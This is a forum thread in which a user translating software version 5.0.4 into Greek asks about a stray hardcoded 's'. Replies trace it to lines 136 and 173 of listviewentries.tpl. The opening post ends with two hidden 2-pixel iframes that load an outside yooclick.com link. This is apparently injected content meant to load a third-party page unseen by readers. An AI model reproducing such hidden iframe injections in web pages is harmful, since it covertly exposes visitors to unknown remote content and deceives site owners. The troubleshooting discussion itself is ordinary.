need some help with my translation...

hi all! maybe this is not the proper place,but here's my problem....

i translated almost the whole 5.0.4 version in Greek but there is a think that i can't fix!

there is an "s" which i cant find where it is to change or remove it...
take a look in my screenshot please,and if anyone knows,tell me where is this line to fix this....Because it messes up the meaning....

thank you for your time.... <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 7 Comments sorted by Votes Date Added
  • hi all! maybe this is not the proper place,but here's my problem....

i translated almost the whole 5.0.4 version in greek but there is a think that i can't fix!

there is an "s" which i cant find where it is to change or remove it...
    take a look in my screenshot please,and if anyone knows,tell me where is this line to fix this....because it messes up the meaning....

thank you for your time....
  • hi,

this problem has been identified and commented about various times both here and on developers list. i don't know if it has been solved in the new 5.1 but in earlier versions this "s" is hardcoded (in the templates i think).

joe
    tsolucio
  • hi machinakias,

its in listviewentries.tpl file, around line number 135.

if you have any other questions feel free to get back to me.
  • dear carlo, i use the 5.0.4 version and here 's my fix...

open listviewentries.tpl file with notepad++ (i prefer this one...) or other editor and chech these two lines:

line 136 {$app.lbl_no} {$app.$module_create}s {$app.lbl_found} !

and

line 173 {$app.lbl_no} {$app.$module_create}s {$app.lbl_found} !</span></td>

as you can see there are two "s" which make this problem....
  • hi carloz,

internationalization is something we want to support with any such glitches in the coming releases, but the fact of the matter remains that such issues are hard find, when go looking for them, unless one is part language translation process. so i would encourage you try out 5.1 and help us in identifying such issues.
  • hi carloz,

its great to have such active community members such as yourself, it makes tasks like these a lot easier, if you do create a lang pack for 5.1 please do share it with us, it will help our testing team as well.